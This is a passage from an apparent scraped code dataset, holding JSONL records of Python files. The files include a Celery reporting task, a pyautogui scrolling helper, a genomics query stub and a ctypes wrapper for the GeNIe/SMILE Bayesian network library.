'../../doc/Vectors/test.zip')\n","sub_path":"app/util/file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"84952303","text":"import datetime\nimport uuid\nfrom lib.casevaultdb import VcfSampleCollection, CaseCollection, QueryLogsCollection\nfrom query.query_base import QueryBase, QueryDesc, QueryDescParam\n\nclass Denovo(QueryBase):\n\n    metadata = {\n        'id': '4',\n        'name': 'variant is in-cis',\n        'description': 'query for snp matching optional family history, population, or clinical ids',\n        'help': '',\n        'parameters': {\n            'chrom': {'type': 'str', 'required': True},\n            'position': {'type': 'str', 'required': True},\n            'allele': 
{'type': 'str', 'required': True},\n            'clinic_indications': {'type': 'str_arr', 'required': False},\n            'family_history': {'type': 'bool', 'required': False},\n            'populations': {'type': 'str_arr', 'required': False}\n        }\n    }\n    \n    @staticmethod\n    def get_query_description():\n        \"\"\" returns query details to the query controller's api \"\"\"\n        return Denovo.metadata\n\n    def execute_hub_query(self, parameters):\n        \"\"\" Case vault query to return results to the hub \"\"\"\n        \n        return 0\n\n    def execute_casevault_query(self, parameters):\n        \"\"\" Execute the query and return detailed results for the case vault \"\"\"","sub_path":"vault/src/query/denovo.py","file_name":"denovo.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"63264000","text":"from celery import shared_task\nfrom celery.schedules import crontab\nfrom celery.decorators import periodic_task\nfrom celery.utils.log import get_task_logger\nfrom .views import contract_queries\nfrom .models import ContractData\n\n\n# @periodic_task(run_every=(crontab(minute='*/1')), name=\"to_contractdata_model\", ignore_result=True)\n@periodic_task(run_every=(crontab(minute=0, hour=23, day_of_week='friday')),\n               name=\"to_contractdata_model\",\n               ignore_result=True)\ndef to_contractdata_model():\n    contract_stats_dict = contract_queries()\n\n    for key, value in contract_stats_dict.items():\n        value = [0 if v is None else v for v in value]\n        department = key\n        contracts_qty = value[0]\n        contracts_sum_total = value[1]\n        contracts_sum_avg = value[2]\n        contract_length_avg = value[3]\n\n        ContractData.objects.create(\n            department=department,\n            contracts_qty=contracts_qty,\n            contracts_sum_total=contracts_sum_total,\n            contracts_sum_avg=contracts_sum_avg,\n            contract_length_avg=contract_length_avg\n        )\n\n    return None\n","sub_path":"src/dashboard/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"508119796","text":"import pyautogui\nfrom win32api import GetSystemMetrics\n\ndef moveNscroll(val, x=None, y=None, duration=1):\n    if x is None or y is None:\n        # if no x and y values are given, automatically detect the screen size, move the mouse near the top right of the screen and scroll\n        x = GetSystemMetrics(0)\n        y = GetSystemMetrics(1)\n        pyautogui.moveTo(x-(x*1/15), y-(y*8/10), duration)\n    else: \n        pyautogui.moveTo(x, y, duration)\n    pyautogui.scroll(val)\n\n# if __name__ == \"__main__\":\n#     moveNscroll(100)","sub_path":"mouseMove.py","file_name":"mouseMove.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"296276719","text":"from __future__ import print_function\r\nfrom builtins import range\r\nfrom builtins import bytes\r\nimport ctypes, re, sys\r\n\r\nif sys.maxsize > 2**32:\r\n\tg = ctypes.windll.LoadLibrary(\"bismile64.dll\")\r\nelse:\r\n\tg = ctypes.windll.LoadLibrary(\"bismile.dll\")\r\n\r\n# This is so that functions return pointer-like objects,\r\n# rather than ints, which won't work on all platforms\r\n# See: https://code.activestate.com/lists/python-list/702828/\r\nclass VOID(ctypes.Structure):\r\n\tpass\r\n\t\r\nclass c_simplechar_p(ctypes.c_char_p):\r\n\t@classmethod\r\n\tdef from_param(cls, obj):\r\n\t\treturn bytes(obj, 'ascii')\r\n\t\r\n\t@classmethod\r\n\tdef _check_retval_(cls, result):\r\n\t\treturn 
result.value.decode('utf-8')\r\n\r\ng.new_network.restype = ctypes.POINTER(VOID)\r\ng.new_intArray.restype = ctypes.POINTER(VOID)\r\ng.intArray_Items.restype = ctypes.POINTER(ctypes.c_int)\r\ng.GetParents.restype = ctypes.POINTER(VOID)\r\ng.header_SetId.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.header_GetId.restype = ctypes.POINTER(VOID)\r\ng.header_SetName.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.header_GetName.restype = c_simplechar_p\r\ng.node_Definition.argtypes = [ctypes.POINTER(VOID)]\r\ng.node_Definition.restype = ctypes.POINTER(VOID)\r\ng.nodeDefinition_GetMatrix.restype = ctypes.POINTER(VOID)\r\ng.nodeDefinition_GetStringDefinition.restype = ctypes.POINTER(c_simplechar_p)\r\ng.nodeDefinition_GetNumberOfOutcomes.restype = ctypes.c_int\r\ng.dMatrix_GetItemsDouble.restype = ctypes.POINTER(ctypes.c_double)\r\ng.dMatrix_GetSize.restype = ctypes.c_int\r\ng.nodeDefinition_GetOutcomesNames.restype = ctypes.POINTER(VOID)\r\ng.stringArray_Items.restype = ctypes.POINTER(c_simplechar_p)\r\ng.node_Value.restype = ctypes.POINTER(VOID)\r\ng.nodeValue_GetMatrix.restype = ctypes.POINTER(VOID)\r\ng.net_Header.restype = ctypes.POINTER(VOID)\r\ng.CalcProbEvidence.restype = ctypes.c_double\r\ng.nodeValue_GetVirtualEvidence.restype = ctypes.POINTER(ctypes.c_double)\r\ng.nodeValue_SetVirtualEvidence.restype = ctypes.c_int\r\ng.equation_SetEquation.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.equation_SetEquation.restype = ctypes.c_int\r\ng.valEqEvaluation_GetSampleMean.restype = ctypes.c_double\r\ng.GetDefaultBNAlgorithm.restype = ctypes.c_int\r\ng.FindNode.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.FindNode.restype = ctypes.POINTER(VOID)\r\ng.GetNode.restype = ctypes.POINTER(VOID)\r\ng.node_Info.restype = ctypes.POINTER(VOID)\r\ng.nodeInfo_Header.restype = ctypes.POINTER(VOID)\r\ng.header_GetId.restype = c_simplechar_p\r\ng.WriteFile.argtypes = [ctypes.POINTER(VOID), c_simplechar_p]\r\ng.AddNode.argtypes = [ctypes.POINTER(VOID), ctypes.c_int, c_simplechar_p]\r\ng.nodeInfo_Screen.restype = ctypes.POINTER(VOID)\r\ng.screenInfo_position.restype = ctypes.POINTER(VOID)\r\n\r\n# Constants\r\nclass Node:\r\n\tNATURE_NODE, CONSTANT_NODE, DECISION_NODE, UTILITY_NODE, DISCONNECTED_NODE, \\\r\n\tEQUATION_NODE = list(range(1,7))\r\nclass Node(Node):\r\n\tNODE_TYPE_MAP = {\r\n\t\tNode.NATURE_NODE: 18, #DSL_CPT (=DSL_CHANCE|DSL_DISCRETE)\r\n\t\tNode.EQUATION_NODE: 4, # DSL_EQUATION/DSL_DETERMINISTIC\r\n\t\tNode.UTILITY_NODE: 8, # DSL_UTILITY\r\n\t\tNode.DECISION_NODE: 17, # DSL_LIST (=DSL_DECISION|DSL_DISCRETE)\r\n\t}\r\nclass Net:\r\n\tALG_BN_LAURITZEN, ALG_BN_HENRION, ALG_BN_PEARL, ALG_BN_LSAMPLING, \\\r\n\t\tALG_BN_SELFIMPORTANCE, ALG_BN_HEURISTICIMPORTANCE, ALG_BN_BACKSAMPLING, \\\r\n\t\tALG_BN_AISSAMPLING, ALG_BN_EPISSAMPLING, ALG_BN_LBP, ALG_BN_LAURITZEN_OLD, \\\r\n\t\tALG_BN_RELEVANCEDECOMP, ALG_BN_RELEVANCEDECOMP2, ALG_HBN_HEPIS, ALG_HBN_HLW, \\\r\n\t\tALG_HBN_HLBP, ALG_HBN_HLOGICSAMPLING = list(range(0,17))\r\n \r\ndef NYI():\r\n\tprint(\"nyi\")\r\n\t\r\nclass BNIError(Exception):\r\n\tdef __init__(self, msg):\r\n\t\tself.msg = msg\r\n\tdef __str__(self):\r\n\t\treturn self.msg\r\n\r\nclass Net(Net):\r\n\teNet = None # A pointer to the network as represented by the engine\r\n\t_autoUpdate = True\r\n\t\r\n\tdef __init__(self, fn = \"\"):\r\n\t\tself.eNet = g.new_network()\r\n\t\tif fn:\r\n\t\t\t# Just being unicode causes problems... 
Not sure how to\r\n\t\t\t# deal with a filename if it was genuinely unicode\r\n\t\t\tfn2 = bytes(fn, 'ascii')\r\n\t\t\tg.ReadFile(self.eNet, fn2)\r\n\t\t\tif fn.endswith(\".dne\"):\r\n\t\t\t\t# Fix up probs that GeNIe has with reading new Netica (>= V4) files\r\n\t\t\t\tcontents = open(fn).read()\r\n\t\t\t\t# Strip out strings and comments (makes scanning for keywords simpler)\r\n\t\t\t\t# Strip out strings\r\n\t\t\t\tcontents = re.sub(r'\"(\\\\\\\\|\\\\\"|[^\"])*?\"', '', contents)\r\n\t\t\t\t# Strip out comments\r\n\t\t\t\tcontents = re.sub(r'//.*', '', contents)\r\n\t\t\t\t# Scan for nodes and their CPTs\r\n\t\t\t\treg = re.compile(r'\\b(node)\\s+(\\w+)\\s*\\{|\\b(probs)\\s*=([^;]*)')\r\n\t\t\t\tstartPos = 0\r\n\t\t\t\tcurrentNode = None\r\n\t\t\t\twhile 1:\r\n\t\t\t\t\tm = reg.search(contents, startPos)\r\n\t\t\t\t\tif m:\r\n\t\t\t\t\t\tif m.group(1)==\"node\":\r\n\t\t\t\t\t\t\tcurrentNode = m.group(2)\r\n\t\t\t\t\t\telif m.group(3)==\"probs\":\r\n\t\t\t\t\t\t\tcptStr = m.group(4)\r\n\t\t\t\t\t\t\t# Flatten to 1D by splitting on commas/parentheses/spaces (any non-numeral symbol)\r\n\t\t\t\t\t\t\tcptStr = cptStr.strip(\"(), \\t\\r\\n\")\r\n\t\t\t\t\t\t\tcptStrs = re.split(r'[(),\\s]+', cptStr)\r\n\t\t\t\t\t\t\t# Convert to floats\r\n\t\t\t\t\t\t\tcpt = [float(f) for f in cptStrs]\r\n\t\t\t\t\t\t\t# Update the in-memory CPT\r\n\t\t\t\t\t\t\tself.node(currentNode).cpt1d(cpt)\r\n\t\t\t\t\t\tstartPos = m.end()\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tbreak\r\n\t\r\n\tdef __del__(self):\r\n\t\tg.delete_network(self.eNet)\r\n\t\r\n\t# This is engine dependent\r\n\tdef updateAlgorithm(self, algorithm = None):\r\n\t\tif algorithm is None:\r\n\t\t\treturn g.GetDefaultBNAlgorithm(self.eNet)\r\n\t\telse:\r\n\t\t\tg.SetDefaultBNAlgorithm(self.eNet, algorithm)\r\n\t\r\n\t# autoUpdate can be turned off for performance. You then need\r\n\t# to manually use 'update' after changes and before reading beliefs.\r\n\tdef autoUpdate(self, autoUpdate = None):\r\n\t\tif autoUpdate is None:\r\n\t\t\treturn self._autoUpdate\r\n\t\telse:\r\n\t\t\tself._autoUpdate = autoUpdate\r\n\r\n\tdef update(self):\r\n\t\tg.UpdateBeliefs(self.eNet)\r\n\t\t\r\n\tdef name(self, _name = None):\r\n\t\theader = g.net_Header(self.eNet)\r\n\t\tif _name is None:\r\n\t\t\treturn g.header_GetId(header)\r\n\t\telse:\r\n\t\t\tg.header_SetId(header, _name)\r\n\t\t\t\r\n\t\treturn self\r\n\t\t\t\r\n\tdef title(self, _title = None):\r\n\t\theader = g.net_Header(self.eNet)\r\n\t\tif _title is None:\r\n\t\t\treturn g.header_GetName(header)\r\n\t\telse:\r\n\t\t\tg.header_SetName(header, _title)\r\n\t\t\t\r\n\t\treturn self\r\n\t\t\t\r\n\tdef write(self, fn):\r\n\t\tg.WriteFile(self.eNet, fn)\r\n\t\t\r\n\tdef node(self, name):\r\n\t\tnodeId = g.FindNode(self.eNet, name)\r\n\t\tif nodeId == -2:\r\n\t\t\treturn None\r\n\t\treturn Node(net = self, genieNodeId = nodeId)\r\n\r\n\tdef addNode(self, name, nodeType = None, states = None):\r\n\t\treturn Node(self, name, nodeType = nodeType, states = states)\r\n\t\r\n\tdef compile(self):\r\n\t\t# No compile phase in GeNIe. 
Might do something in future.\r\n\t\tpass\r\n\t\r\n\tdef retractFindings(self):\r\n\t\tg.ClearAllEvidence(self.eNet)\r\n\t\t\r\n\tdef nodes(self):\r\n\t\tintArray = g.new_intArray()\r\n\t\tg.GetAllNodes(self.eNet, intArray)\r\n\t\tnumItems = g.intArray_NumItems(intArray)\r\n\t\titems = g.intArray_Items(intArray)\r\n\t\tnodeList = []\r\n\t\tfor i in range(numItems):\r\n\t\t\tnodeList.append(Node(self,genieNodeId=items[i]))\r\n\t\treturn nodeList\r\n\t\t\t\r\n\tdef findingsProbability(self):\r\n\t\treturn g.CalcProbEvidence(self.eNet)\r\n\r\n\t# Not sure these belong here\r\n\t@classmethod\r\n\tdef numberCombinations(cls, nodes):\r\n\t\ttotal = 1\r\n\r\n\t\tfor i in range(len(nodes)):\r\n\t\t\ttotal *= nodes[i].numberStates()\r\n\r\n\t\treturn total if len(nodes)>0 else 0\r\n\r\n\t# This function works for discrete nodes only, of course\r\n\t# nodeStates should be an array the size of len(nodes)\r\n\t@classmethod\r\n\tdef nextCombination(cls, nodeStates, nodes, skip = []):\r\n\t\t# Flip skip array (which also makes it a dict)\r\n\t\tfs = {}\r\n\t\tfor i,v in enumerate(skip): fs[v] = skip[i]\r\n\t\tskip = fs\r\n\t\t\r\n\t\tnumNodes = len(nodeStates)\r\n\t\tfor i in range(numNodes-1,-1,-1):\r\n\t\t\tif i in skip: continue\r\n\t\t\tnodeStates[i] += 1\r\n\t\t\tif nodeStates[i] >= nodes[i].numberStates():\r\n\t\t\t\t# Set the i^th node state to 0 and continue to next node\r\n\t\t\t\tnodeStates[i] = 0\r\n\t\t\telse:\r\n\t\t\t\t# More combinations to come\r\n\t\t\t\treturn True\r\n\t\t# All node states have rolled back round to 0\r\n\t\treturn False\r\n\r\n\r\nclass Node(Node):\r\n\tnet = None\r\n\teId = None # The ID (integer) of this node in GeNIe (for the given net)\r\n\t\r\n\tdef __init__(self, net = None, name = None, states = None, nodeType = None, genieNodeId = None):\r\n\t\tself.net = net\r\n\t\tself.eId = genieNodeId\r\n\t\tself._states = None\r\n\t\tself._stateNames = None\r\n\t\tself._statesLookup = None\r\n\t\tif name is not None:\r\n\t\t\tif not self.checkValidName(name):\r\n\t\t\t\traise BNIError(\"Node name \"+repr(name)+\" is not valid. Must have \" +\r\n\t\t\t\t\t\"first character as letter/underscore, \"+\r\n\t\t\t\t\t\"other characters as letter/number/underscore and max. 
30 characters\")\r\n\t\t\tif nodeType is None: nodeType = Node.NATURE_NODE\r\n\t\t\tself.eId = g.AddNode(self.net.eNet, Node.NODE_TYPE_MAP[nodeType], name)\r\n\t\t\r\n\t\tif states:\r\n\t\t\tself.renameStates(states)\r\n\t\t\tfor i in range(2,len(states)):\r\n\t\t\t\tself.addState(states[i])\r\n\t\r\n\t# Some utility functions, unlikely to be useful outside\r\n\tdef _gNode(self):\r\n\t\treturn g.GetNode(self.net.eNet, self.eId)\r\n\t\r\n\tdef _gNodeDef(self):\r\n\t\tnodePtr = self._gNode()\r\n\t\treturn g.node_Definition(nodePtr)\r\n\t\r\n\tdef _gNodeVal(self):\r\n\t\treturn g.node_Value(self._gNode())\r\n\t\r\n\tdef checkValidName(self, name):\r\n\t\t# Netica convention: first character is letter/underscore,\r\n\t\t# other characters are letter/number/underscore\r\n\t\t# Max 30 characters\r\n\t\tif re.match(r'[a-zA-Z_][a-zA-Z0-9_]{,29}', name):\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\t\t\t\r\n\tdef name(self):\r\n\t\t# Not sure why it's so buried away in GeNIe\r\n\t\tmyNodePtr = g.GetNode(self.net.eNet, self.eId)\r\n\t\tnodeInfoPtr = g.node_Info(myNodePtr)\r\n\t\theaderPtr = g.nodeInfo_Header(nodeInfoPtr)\r\n\t\treturn g.header_GetId(headerPtr)\r\n\t\t\r\n\tdef title(self):\r\n\t\t# Not sure why it's so buried away in GeNIe\r\n\t\tmyNodePtr = g.GetNode(self.net.eNet, self.eId)\r\n\t\tnodeInfoPtr = g.node_Info(myNodePtr)\r\n\t\theaderPtr = g.nodeInfo_Header(nodeInfoPtr)\r\n\t\treturn g.header_GetName(headerPtr)\r\n\t\t\r\n\tdef getKind(self):\r\n\t\tNYI()\r\n\tdef parents(self):\r\n\t\tparentIds = g.GetParents(self.net.eNet, self.eId)\r\n\t\tparentIdItems = g.intArray_Items(parentIds)\r\n\t\tnumItems = g.intArray_NumItems(parentIds)\r\n\t\tparents = []\r\n\t\tfor i in range(numItems):\r\n\t\t\tparents.append(Node(self.net, genieNodeId=parentIdItems[i]))\r\n\t\treturn parents\r\n\r\n\t# Slow impl.\r\n\tdef children(self):\r\n\t\tallNodes = self.net.nodes()\r\n\t\tchildren = []\r\n\t\tfor node in allNodes:\r\n\t\t\tif self.name() in [p.name() for p in node.parents()]:\r\n\t\t\t\tchildren.append(node)\r\n\t\treturn children\t\r\n\t\t\r\n\tdef addParents(self, parents):\r\n\t\t\"\"\"\r\n\t\tEach element of parents can be an existing node name or node.\r\n\t\t\"\"\"\r\n\t\tfor parent in parents:\r\n\t\t\t# Make sure each parent is a Node object\r\n\t\t\tif isinstance(parent, str):\r\n\t\t\t\tparent = self.net.node(parent)\r\n\t\t\tg.AddArc(self.net.eNet, parent.eId, self.eId)\r\n\t\t\r\n\t\t# Allow the call chain to continue\r\n\t\treturn self\r\n\t\t\r\n\tdef addChildren(self, children):\r\n\t\t\"\"\"\r\n\t\tEach element of children can be an existing node name or node.\r\n\t\t\"\"\"\r\n\t\tfor child in children:\r\n\t\t\t# Make sure each parent is a Node object\r\n\t\t\tif isinstance(child, str):\r\n\t\t\t\tchild = self.net.node(child)\r\n\t\t\tg.AddArc(self.net.eNet, self.eId, child.eId)\r\n\r\n\t\t# Allow the call chain to continue\r\n\t\treturn self\r\n\t\r\n\tdef _clearStatesCache(self):\r\n\t\tself._stateNames = None\r\n\t\tself._statesLookup = None\r\n\t\tself._states = None\r\n\t\r\n\tdef _setupStates(self, force = False):\r\n\t\t# set 'force' or erase _stateNames to clear cache\r\n\t\tif not force and self._stateNames: return\r\n\t\t\r\n\t\tself._stateNames = self.stateNames()\r\n\t\tself._statesLookup = dict((k,State(self,i)) for i,k in enumerate(self._stateNames))\r\n\t\tself._states = []\r\n\t\tfor stateName in self._stateNames:\r\n\t\t\tself._states.append(self._statesLookup[stateName])\r\n\t\t\r\n\tdef state(self, 
name):\r\n\t\tself._setupStates()\r\n\t\t\r\n\t\t# If int (assumed if not str), then just get state\r\n\t\tif not isinstance(name,str):\r\n\t\t\treturn self._states[name]\r\n\t\t\r\n\t\treturn self._statesLookup[name]\r\n\t\t\r\n\tdef states(self):\r\n\t\tself._setupStates()\r\n\t\t\r\n\t\treturn self._states\r\n\t\t\r\n\tdef hasState(self, name):\r\n\t\tself._setupStates()\r\n\t\t\r\n\t\treturn name in self._statesLookup\r\n\t\r\n\tdef addState(self, name):\r\n\t\tnd = self._gNodeDef()\r\n\t\tg.nodeDefinition_AddOutcome(nd, name)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\r\n\tdef renameState(self, name, newName):\r\n\t\tnd = self._gNodeDef()\r\n\t\tstateNames = self.stateNames()\r\n\t\tstate = self.state(name)\r\n\t\tstateNames[state.stateNum] = newName\r\n\t\t\r\n\t\tstateNamesArg = (c_simplechar_p*len(stateNames))(*[bytes(s,'ascii') for s in stateNames])\r\n\t\t\r\n\t\tg.nodeDefinition_RenameOutcomes(nd, len(stateNames), stateNamesArg)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\t\r\n\tdef renameStates(self, newNames):\r\n\t\tnd = self._gNodeDef()\r\n\r\n\t\tstateNamesArg = (ctypes.c_char_p*len(newNames))(*[bytes(s,'ascii') for s in newNames])\r\n\t\t\r\n\t\tg.nodeDefinition_RenameOutcomes(nd, len(newNames), stateNamesArg)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\t\r\n\tdef setEquation(self, equationStr):\r\n\t\tnd = self._gNodeDef()\r\n\t\t\r\n\t\treturn g.equation_SetEquation(nd, equationStr)\r\n\t\t\r\n\tdef setExperience(self, parentStates, experience):\r\n\t\t# It's not clear to me GeNIe supports this\r\n\t\tNYI()\r\n\t\r\n\tdef numberStates(self):\r\n\t\tnodeDef = self._gNodeDef()\r\n\t\treturn g.nodeDefinition_GetNumberOfOutcomes(nodeDef)\r\n\t\t\r\n\tdef retractFindings(self):\r\n\t\tgNode = self._gNode()\r\n\t\tgValue = g.node_Value(gNode)\r\n\t\tg.nodeValue_ClearEvidence(gValue)\r\n\t\r\n\tdef likelihoods(self, likelihoodVector = None):\r\n\t\tif likelihoodVector is None:\r\n\t\t\tevArr = g.nodeValue_GetVirtualEvidence(self._gNodeVal())\r\n\t\t\tsize = int(evArr[0])\r\n\t\t\tretArr = []\r\n\t\t\tfor i in range(size):\r\n\t\t\t\tretArr.append(evArr[i+1])\r\n\t\t\treturn retArr\r\n\t\telse:\r\n\t\t\tfrom struct import pack\r\n\t\t\tn = len(likelihoodVector)\r\n\t\t\tdp = (ctypes.c_double*n)(*likelihoodVector)\r\n\t\t\tg.nodeValue_SetVirtualEvidence(self._gNodeVal(),\r\n\t\t\t\tlen(likelihoodVector), dp)\r\n\t\r\n\tdef finding(self, state):\r\n\t\tself.state(state).setTrueFinding()\r\n\t\t\r\n\tdef beliefs(self):\r\n\t\tif self.net._autoUpdate:\r\n\t\t\tself.net.update()\r\n\t\t\r\n\t\tgNode = self._gNode()\r\n\t\tgNodeValue = g.node_Value(gNode)\r\n\t\t#rint \"node value type:\", g.nodeValue_GetType(gNode)\r\n\t\tgMat = g.nodeValue_GetMatrix(gNodeValue)\r\n\t\t\r\n\t\tgSize = g.dMatrix_GetSize(gMat)\r\n\t\tgDbl = g.dMatrix_GetItemsDouble(gMat)\r\n\t\tbeliefs = []\r\n\t\tfor i in range(gSize):\r\n\t\t\tbeliefs.append(gDbl[i])\r\n\t\t\r\n\t\treturn beliefs\r\n\t\r\n\tdef _equationMean(self):\r\n\t\tgNode = self._gNode()\r\n\t\tgNodeValue = g.node_Value(gNode)\r\n\t\t\r\n\t\treturn g.valEqEvaluation_GetSampleMean(gNodeValue)\r\n\t\t\r\n\tdef probs(self, parentStates):\r\n\t\tNYI()\r\n\tdef stateNames(self):\r\n\t\tnodeDef = self._gNodeDef()\r\n\t\tstateNameArray = g.nodeDefinition_GetOutcomesNames(nodeDef)\r\n\t\tcharStarStar = g.stringArray_Items(stateNameArray)\r\n\t\t\r\n\t\tstateNames = []\r\n\t\tfor i in range(self.numberStates()):\r\n\t\t\tstateNames.append(charStarStar[i].value.decode('utf-8'))\r\n\t\t\t\r\n\t\treturn stateNames\r\n\t\r\n\tdef position(self, 
x = None, y = None):\r\n\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\tnodeInfo = g.node_Info(node)\r\n\t\tscreenInfo = g.nodeInfo_Screen(nodeInfo)\r\n\t\tposition = g.screenInfo_position(screenInfo)\r\n\t\tif x is not None:\r\n\t\t\tg.rectangle_center_X_set(position, x)\r\n\t\tif y is not None:\r\n\t\t\tg.rectangle_center_Y_set(position, y)\r\n\t\tif x is None and y is None:\r\n\t\t\treturn [g.rectangle_center_X(position), g.rectangle_center_Y(position)]\r\n\t\telse:\r\n\t\t\treturn self\r\n\r\n\tdef cpt1d(self, newCpt = None):\r\n\t\tif newCpt is None:\r\n\t\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\t\tnodeDef = g.node_Definition(node)\r\n\t\t\tnodeMat = g.nodeDefinition_GetMatrix(nodeDef)\r\n\t\t\tnumItems = g.dMatrix_GetSize(nodeMat)\r\n\r\n\t\t\tcptDbl = []\r\n\t\t\tdbArr = g.dMatrix_GetItemsDouble(nodeMat)\r\n\t\t\tfor i in range(numItems):\r\n\t\t\t\tcptDbl.append(dbArr[i])\r\n\r\n\t\t\treturn cptDbl\r\n\t\telse:\r\n\t\t\tnd = self._gNodeDef()\r\n\t\t\t\r\n\t\t\tnumStates = self.numberStates()\r\n\t\t\t\r\n\t\t\ttotalParams = len(newCpt)\r\n\t\t\trows = int(totalParams/numStates)\r\n\t\t\t\r\n\t\t\t# Normalisation\r\n\t\t\tfor r in range(rows):\r\n\t\t\t\tr *= numStates\r\n\t\t\t\ttotalRow = sum(newCpt[r:r+numStates])\r\n\t\t\t\tif totalRow:\r\n\t\t\t\t\tfor i in range(r, r+numStates):\r\n\t\t\t\t\t\tnewCpt[i] = newCpt[i]/totalRow\r\n\t\t\t\r\n\t\t\tnc = (ctypes.c_double*len(newCpt))(*newCpt)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetDoubleDefinition(nd, len(newCpt), nc)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\r\n\tdef cpt(self, newCpt = None):\r\n\t\tif newCpt is None:\r\n\t\t\tcpt1d = self.cpt1d()\r\n\t\t\tnumStates = self.numberStates()\r\n\r\n\t\t\tdef chunks(l, n):\r\n\t\t\t\treturn [l[i:i+n] for i in range(0, len(l), n)]\r\n\r\n\t\t\tcpt = chunks(cpt1d, numStates)\r\n\r\n\t\t\treturn cpt\r\n\t\telse:\r\n\t\t\tnd = self._gNodeDef()\r\n\t\t\t\r\n\t\t\t# Normalisation (each row of the 2D CPT is normalised in place)\r\n\t\t\tnewCpt2 = []\r\n\t\t\tfor row in newCpt:\r\n\t\t\t\ttotalRow = sum(row)\r\n\t\t\t\tif totalRow:\r\n\t\t\t\t\tfor i in range(len(row)):\r\n\t\t\t\t\t\trow[i] = row[i]/totalRow\r\n\t\t\t\tnewCpt2.extend(row)\r\n\t\t\t\r\n\t\t\tnc = (ctypes.c_double*len(newCpt2))(*newCpt2)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetDoubleDefinition(nd, len(newCpt2), nc)\r\n\t\t\r\n\t\t# Chain\r\n\t\treturn self\r\n\t\r\n\t# Can be used with utility nodes to get/set utilities\r\n\tdef utilities(self, newUtilities = None):\r\n\t\t# Get\r\n\t\tif newUtilities is None:\r\n\t\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\t\tnodeDef = g.node_Definition(node)\r\n\t\t\tnodeMat = g.nodeDefinition_GetMatrix(nodeDef)\r\n\t\t\tnumItems = g.dMatrix_GetSize(nodeMat)\r\n\r\n\t\t\t# Utils are one dimensional (one for each parent combo)\r\n\t\t\tutilDbl = []\r\n\t\t\tdbArr = g.dMatrix_GetItemsDouble(nodeMat)\r\n\t\t\tfor i in range(numItems):\r\n\t\t\t\tutilDbl.append(dbArr[i])\r\n\r\n\t\t\treturn utilDbl\r\n\t\t# Set\r\n\t\telse:\r\n\t\t\tnd = self._gNodeDef()\r\n\t\t\tnc = (ctypes.c_double*len(newUtilities))(*newUtilities)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetDoubleDefinition(nd, len(newUtilities), nc)\r\n\t\r\n\t# For decision/utility nodes. 
XXX Need to add checks\r\n\tdef expectedValues(self):\r\n\t\treturn self.beliefs()\r\n\t\t\r\n\t# Can be used with decision nodes to get/set decision options\r\n\tdef options(self, newOptions = None):\r\n\t\t# Get\r\n\t\tif newOptions is None:\r\n\t\t\tnode = g.GetNode(self.net.eNet, self.eId)\r\n\t\t\tnodeDef = g.node_Definition(node)\r\n\t\t\tstringArr = g.nodeDefinition_GetStringDefinition(nodeDef, self.numberStates())\r\n\t\t\t\r\n\t\t\tstateNames = []\r\n\t\t\tfor i in range(self.numberStates()):\r\n\t\t\t\tstateNames.append(stringArr[i])\r\n\r\n\t\t\treturn stateNames\r\n\t\t# Set\r\n\t\telse:\r\n\t\t\tnodeDef = self._gNodeDef()\r\n\t\t\tno = (ctypes.c_char_p*len(newOptions))(*newOptions)\r\n\t\t\t\r\n\t\t\tg.nodeDefinition_SetStringDefinition(nodeDef, len(newOptions), no)\r\n\r\nclass State:\r\n\tdef __init__(self, node = None, stateNum = None):\r\n\t\tself.node = node\r\n\t\tself.stateNum = stateNum\r\n\t\r\n\tdef name(self, _name = None):\r\n\t\tif _name is None:\r\n\t\t\tself.node._setupStates()\r\n\r\n\t\t\treturn self.node._stateNames[self.stateNum]\r\n\t\telse:\r\n\t\t\tself.node.renameState(self.stateNum, _name)\r\n\t\t\r\n\t\t\tself.node._setupStates(force = True)\r\n\r\n\tdef title(self, _title = None):\r\n\t\tNYI()\r\n\tdef setTrueFinding(self):\r\n\t\tgNode = self.node._gNode()\r\n\t\tgNodeValue = g.node_Value(gNode)\r\n\t\tg.nodeValue_SetEvidence(gNodeValue, self.stateNum)\r\n","sub_path":"bni_smile.py","file_name":"bni_smile.py","file_ext":"py","file_size_in_byte":18643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35475203","text":"###############################################################################\n#The MIT License (MIT)\n#\n#Copyright (c) 2014 Justin Lovinger\n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in all\n#copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND 